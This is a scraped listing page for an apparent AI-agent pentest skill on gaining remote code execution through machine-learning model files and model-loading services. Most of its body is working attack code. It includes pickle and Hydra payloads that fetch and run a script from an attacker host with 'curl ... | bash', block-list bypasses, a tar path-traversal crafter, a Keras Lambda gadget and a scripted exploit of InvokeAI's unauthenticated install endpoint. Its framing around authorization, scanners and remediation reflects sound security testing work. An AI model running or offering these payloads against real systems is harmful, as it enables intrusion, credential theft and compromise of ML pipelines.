Run any Skill in Manus with one click

exploiting-ai-model-file-rce

Testing machine-learning model files and model-loading services for remote code execution caused by insecure deserialization (pickle/PyTorch), unsafe config instantiation (Hydra), archive path traversal, and dangerous layer types during authorized penetration tests of AI/ML pipelines.

Run Skill in Manus

Stars599

Forks104

UpdatedJune 6, 2026 at 16:41

Source

xalgord

xalgord/xalgorix

View GitHub Repository View Creator Repositories

Install command

Download

Run Skill in Manus

SKILL.md

readonly

More from this repository

same repository

detecting-ai-model-prompt-injection-attacks

xalgord/xalgorix

Detects prompt injection attacks targeting LLM-based applications using a multi-layered defense combining regex pattern matching for known attack signatures, heuristic scoring for structural anomalies, and transformer-based classification with DeBERTa models. The detector analyzes user inputs before they reach the LLM, flagging direct injections (system prompt overrides, role-play escapes, instruction hijacking) and indirect injections (encoded payloads, multi-language obfuscation, delimiter-based escapes). Based on the OWASP LLM Top 10 (LLM01:2025 Prompt Injection) and Simon Willison's prompt injection taxonomy. Activates for requests involving prompt injection detection, LLM input sanitization, AI security scanning, or prompt attack classification.

2026-06-06599

implementing-llm-guardrails-for-security

xalgord/xalgorix

Implements input and output validation guardrails for LLM-powered applications to prevent prompt injection, data leakage, toxic content generation, and hallucinated outputs. Builds a security validation pipeline using NVIDIA NeMo Guardrails Colang definitions, custom Python validators for PII detection and content policy enforcement, and the Guardrails AI framework for structured output validation. The guardrails system intercepts both user inputs (blocking injection attempts, stripping PII, enforcing topic boundaries) and model outputs (detecting hallucinations, filtering toxic content, validating JSON schema compliance). Activates for requests involving LLM output validation, AI content filtering, guardrail implementation, or LLM safety enforcement.

2026-06-06599

performing-ai-assisted-vulnerability-discovery

xalgord/xalgorix

Using LLMs to accelerate vulnerability research and pentest workflows — generating syntax-valid fuzzing seeds and evolving grammars, fine-tuned mutation dictionaries, parallel agent-based proof-of-vulnerability generation, and evidence-driven passive analysis of real HTTP traffic via the Burp MCP server. Covers concrete prompts, AFL++/ libFuzzer wiring, and Burp+Codex/Gemini/Ollama MCP setup.

2026-06-06599

testing-llm-prompt-injection-and-jailbreaks

xalgord/xalgorix

Testing LLM-backed applications, chatbots, and AI agents for direct and indirect prompt injection, jailbreaks, system-prompt leakage, and tool/agent abuse during authorized penetration tests, using structured payload families and reliable confirmation signals.

2026-06-06599

testing-mcp-server-security

xalgord/xalgorix

Testing Model Context Protocol (MCP) servers and the clients that consume them for tool poisoning, prompt injection via tool descriptions/outputs, over-permissioned and local-credential-stealing tools, config/trust bypasses, and unauthenticated RCE during authorized penetration tests of AI agent infrastructure.

2026-06-06599

detecting-api-enumeration-attacks

xalgord/xalgorix

Detect and prevent API enumeration attacks including BOLA and IDOR exploitation by monitoring sequential identifier access patterns and authorization failures.

2026-06-06599

name	exploiting-ai-model-file-rce
description	Testing machine-learning model files and model-loading services for remote code execution caused by insecure deserialization (pickle/PyTorch), unsafe config instantiation (Hydra), archive path traversal, and dangerous layer types during authorized penetration tests of AI/ML pipelines.
domain	cybersecurity
subdomain	ai-security
tags	["ai-security","model-deserialization","penetration-testing"]
version	1.0
author	xalgorix
license	Apache-2.0

Exploiting AI Model File RCE

When to Use

During authorized assessments of ML training/inference pipelines, model registries, artifact buckets, or model hubs
When a service downloads, loads, or "installs" models from user-controlled URLs or untrusted repositories
When auto-resume/auto-deploy pipelines load checkpoints (.ckpt, .pt, .pth, .bin) without provenance checks
When assessing web UIs like InvokeAI, TorchServe, Triton, or NeMo/HuggingFace coders that accept model files
When reviewing whether "safe" formats (.safetensors, .nemo, repo config.json) still expose instantiation gadgets

Prerequisites

Authorization: Written penetration testing agreement covering the ML systems and any callback infrastructure
Python 3 with torch, joblib, numpy, tensorflow/keras to craft and load test artifacts in a sandbox
fickling, modelscan, picklescan: static analyzers to inspect pickle opcodes before/after crafting payloads
A controlled callback host: HTTP listener / OOB server (e.g. interactsh) for blind execution confirmation
Isolated VM/container: NEVER load untrusted models on your own host — payloads run during load

Critical: Techniques Most Often Missed (test these for EVERY model artifact)

Scanners that only diff weights miss code execution that fires during load, before any inference runs. For every model file or model-loading endpoint, work the full matrix below.

# 1. Python pickle reducer (THE #1 vector). Any pickle-backed format runs
#    __reduce__ on load: .pkl, .pt, .pth, .ckpt, .bin, joblib, numpy .npy/.npz.
#    torch.load WITHOUT weights_only=True deserializes pickle → code exec.
class Payload:
    def __reduce__(self):
        import os
        return (os.system, ("curl http://ATTACKER/x|bash",))

# 2. Hydra _target_ instantiation — NO pickle needed. Triggers on "safe"
#    formats (.safetensors __metadata__, .nemo model_config.yaml, config.json)
#    when libs feed untrusted metadata to hydra.utils.instantiate().
#      _target_: builtins.exec
#      _args_: ["import os; os.system('id')"]
#    Block-list bypass: enum.bltns.eval, nemo.core.classes.common.os.system

# 3. Keras/TensorFlow Lambda layer — arbitrary Python in legacy .h5/HDF5 and
#    .keras (safe_mode does NOT cover the old H5 format → "downgrade attack").
#    Also CVE-2021-37678: yaml.unsafe_load when loading model from YAML.

# 4. Archive path traversal — most formats are .zip/.tar under the hood.
#    Craft member name "../../tmp/hacked" or a SYMTYPE symlink to write/read
#    arbitrary files on load (ONNX external-weights, model tars).

# 5. GGUF / GGML parser memory corruption (CVE-2024-25664..25668): malformed
#    .gguf triggers heap overflow in the parser.

# 6. Service-level loaders: torch.load on user URL (InvokeAI CVE-2024-12029),
#    TorchServe management API (ShellTorch), Triton --model-control path
#    traversal, numpy np.load default allow_pickle.

How to CONFIRM a hit (avoid destructive payloads)

Use a benign, observable side effect — not a destructive command — to confirm execution:

File-drop marker: os.system("id > /tmp/pwned_$(hostname)") then read /tmp/pwned_*.
OOB callback: curl http://OOB-ID.oob.example/ or DNS lookup; a hit proves blind execution.
Static pre-check: fickling --check-safety model.pt or modelscan -p model.pt should flag the reducer/GLOBAL+REDUCE opcodes before you ever load it.
For Hydra: a process spawn at from_pretrained/restore_from time, before weights load.
Treat ANY child process, outbound connection, or unexpected file at load time as a confirmed hit.

Workflow

Step 1: Identify the Loader and Format

Determine exactly how the target ingests models and which API does the deserialization.

# Map model file extensions present in registry/bucket/repo
# .pt .pth .ckpt .bin .pkl  -> pickle-backed (torch.load / joblib / pickle)
# .h5 .hdf5 .keras          -> Keras (Lambda layer / yaml)
# .safetensors .nemo        -> "safe" weights BUT check for Hydra _target_ metadata
# .onnx                     -> archive/external-weights traversal
# .gguf .ggml               -> parser memory corruption
# .npy .npz                 -> numpy allow_pickle

# Inspect a sample pickle artifact statically BEFORE loading
fickling --check-safety suspicious.pt
modelscan -p suspicious.pt
picklescan -p suspicious.pkl

Step 2: Craft a PyTorch / pickle Reducer Payload

The reducer returns a callable + args executed during unpickling.

# payload_gen.py  (run only in an isolated lab)
import torch, os

class Evil:
    def __reduce__(self):  # benign confirmation marker, not destructive
        return (os.system, ("id > /tmp/pwned; curl http://OOB-ID.oob.example/",))

# place under a key deserialized early so it fires before weights are used
torch.save({"model_state_dict": Evil(), "trainer_state": {"epoch": 10}}, "malicious.ckpt")

Victim-side this fires even with an error: torch.load("malicious.ckpt", weights_only=False). A raw .pkl works the same with pickle.dump(Evil(), f).

Step 3: Craft a Hydra `_target_` Payload for "Safe" Formats

When the loader passes model metadata/config to hydra.utils.instantiate(), no pickle is required.

# goes in .nemo model_config.yaml, repo config.json, or .safetensors __metadata__
_target_: builtins.exec
_args_:
  - "import os; os.system('curl http://ATTACKER/x|bash')"

If a string block-list is present, bypass via alternative import paths (enum.bltns.eval) or application-resolved names (nemo.core.classes.common.os.system).

Step 4: Craft Archive Traversal / Keras Lambda Variants

# Archive path traversal: write outside the extract dir on load
import tarfile
def escape(member):
    member.name = "../../tmp/hacked"
    return member
with tarfile.open("traversal_demo.model", "w:gz") as tf:
    tf.add("harmless.txt", filter=escape)

# Symlink variant (member.type = SYMTYPE, linkname = /tmp) rides a planted file
# Keras Lambda layer: a model containing a Lambda(lambda x: __import__('os').system('id'))
#   runs on load; legacy .h5 bypasses safe_mode entirely (downgrade attack).

Step 5: Exploit a Model-Loading Service (InvokeAI CVE-2024-12029)

When a service downloads+loads models from a URL, host the payload and trigger the endpoint.

import requests
# 1) host payload.ckpt (a pickle reducer) on http://ATTACKER/payload.ckpt
# 2) trigger the unauthenticated install endpoint (scan defaults to false in 5.3.1-5.4.2)
requests.post(
    "http://TARGET:9090/api/v2/models/install",
    params={"source": "http://ATTACKER/payload.ckpt", "inplace": "true"},
    json={}, timeout=5,
)
# torch.load() runs the os.system gadget -> RCE as the InvokeAI process
# Metasploit: exploit/linux/http/invokeai_rce_cve_2024_12029

For Transformers4Rec/Merlin (CVE-2025-23298) and FaceDetection-DSFD, the same reducer is delivered via a trojanized checkpoint or pushed as a serialized blob to a deserializing endpoint.

Step 6: Confirm and Assess Blast Radius

# confirm out-of-band: inspect OOB server for the callback; on a lab target verify the
# /tmp/pwned marker and running user (often root in containers).
# record: runs as root/privileged container? network egress + ~/.aws/~/.ssh/registry creds?
#         loader in an auto-resume/auto-deploy pipeline (wormable)?

Key Concepts

Concept	Description
Pickle Reducer	`__reduce__`/`__setstate__` returns a callable+args executed during unpickling — the core RCE primitive
weights_only	`torch.load(file, weights_only=True)` blocks arbitrary pickle; absence (CVE-2025-32434 bypass aside) enables RCE
Hydra instantiate	`hydra.utils.instantiate()` imports+calls any dotted `_target_` from untrusted config/metadata, no pickle needed
Lambda layer RCE	Keras Lambda layers store arbitrary Python; legacy `.h5` bypasses `safe_mode` (downgrade attack)
Archive slip	Model formats are `.zip`/`.tar`; crafted member names or symlinks cause path traversal write/read on load
Parser memory corruption	Malformed GGUF/TFLite files trigger heap overflows in native parsers
Safe format ≠ safe load	`.safetensors`/`.nemo` carry metadata that can still reach an instantiation gadget

Tools & Systems

Tool	Purpose
fickling	Decompile/inspect and safety-check pickle opcodes; detect malicious GLOBAL/REDUCE
modelscan (Protect AI)	Scan PyTorch/TF/Keras/joblib model files for unsafe operators before loading
picklescan	Lightweight scanner for dangerous imports/opcodes in pickle files
Metasploit	`invokeai_rce_cve_2024_12029`, `flowise_*` and other model-service RCE modules
safetensors	Non-executable weights format; recommended remediation target
Isolated VM/container	Mandatory sandbox for loading any untrusted artifact (seccomp/AppArmor, no egress)

Common Scenarios

Scenario 1: Trojanized Checkpoint in a Model Hub

A .ckpt shared on an internal hub embeds a __reduce__ gadget. An auto-resume training job calls torch.load(..., weights_only=False) and executes the payload as root in the training container.

Scenario 2: InvokeAI URL Install RCE

InvokeAI 5.3.1–5.4.2 exposes /api/v2/models/install with scan=false default. Pointing source at an attacker-hosted .ckpt triggers torch.load pickle deserialization and unauthenticated RCE.

Scenario 3: "Safe" Format Still Pops a Shell

A .safetensors model ships an __metadata__ block with _target_: builtins.exec. The loader feeds metadata to hydra.utils.instantiate() during from_pretrained, executing code before weights load.

Scenario 4: ONNX/Model Tar Path Traversal

A model tar contains a member named ../../home/user/.bashrc. Extraction during model load overwrites the file, achieving persistence/RCE on the next shell session.

Output Format

## AI Model File RCE Finding

**Vulnerability**: Remote Code Execution via Insecure Model Deserialization
**Severity**: Critical (CVSS 9.8)
**Component**: torch.load() in /api/v2/models/install (model loader service)
**CVE / Class**: CVE-2024-12029 / Insecure Deserialization (CWE-502)

### Reproduction Steps
1. Host payload.ckpt (pickle __reduce__ -> os.system) on attacker HTTP server
2. POST source=http://ATTACKER/payload.ckpt to /api/v2/models/install (no auth)
3. Service calls torch.load(); reducer executes; OOB callback received at OOB-ID.oob.example

### Evidence
| Item | Detail |
|------|--------|
| Trigger | torch.load(path) with weights_only unset |
| Confirmation | OOB HTTP callback + /tmp/pwned marker (uid=0 root) |
| Blast radius | Worker runs as root in container with AWS creds + egress |
| Static detector | fickling --check-safety flagged REDUCE -> os.system |

### Recommendation
1. Never deserialize untrusted models; prefer Safetensors/ONNX for weights
2. Use torch.load(weights_only=True) or an allow-listed unpickler
3. Enforce model provenance/signatures and malware-scan before load (scan=True)
4. Sandbox deserialization: non-root, seccomp/AppArmor, no network egress
5. Reject untrusted Hydra _target_ / Keras Lambda; validate config metadata
6. Patch loaders (InvokeAI >= 5.4.3, TorchServe, Triton, GGML) to fixed versions

exploiting-ai-model-file-rce

More from this repository

Exploiting AI Model File RCE

When to Use

Prerequisites

Critical: Techniques Most Often Missed (test these for EVERY model artifact)

How to CONFIRM a hit (avoid destructive payloads)

Workflow

Step 1: Identify the Loader and Format

Step 2: Craft a PyTorch / pickle Reducer Payload

Step 3: Craft a Hydra _target_ Payload for "Safe" Formats

Step 4: Craft Archive Traversal / Keras Lambda Variants

Step 5: Exploit a Model-Loading Service (InvokeAI CVE-2024-12029)

Step 6: Confirm and Assess Blast Radius

Key Concepts

Tools & Systems

Common Scenarios

Scenario 1: Trojanized Checkpoint in a Model Hub

Scenario 2: InvokeAI URL Install RCE

Scenario 3: "Safe" Format Still Pops a Shell

Scenario 4: ONNX/Model Tar Path Traversal

Output Format

Exploiting AI Model File RCE

When to Use

Prerequisites

Critical: Techniques Most Often Missed (test these for EVERY model artifact)

How to CONFIRM a hit (avoid destructive payloads)

Workflow

Step 1: Identify the Loader and Format

Step 2: Craft a PyTorch / pickle Reducer Payload

Step 3: Craft a Hydra _target_ Payload for "Safe" Formats

Step 4: Craft Archive Traversal / Keras Lambda Variants

Step 5: Exploit a Model-Loading Service (InvokeAI CVE-2024-12029)

Step 6: Confirm and Assess Blast Radius

Key Concepts

Tools & Systems

Common Scenarios

Scenario 1: Trojanized Checkpoint in a Model Hub

Scenario 2: InvokeAI URL Install RCE

Scenario 3: "Safe" Format Still Pops a Shell

Scenario 4: ONNX/Model Tar Path Traversal

Output Format

More from this repository

Step 3: Craft a Hydra `_target_` Payload for "Safe" Formats

Step 3: Craft a Hydra `_target_` Payload for "Safe" Formats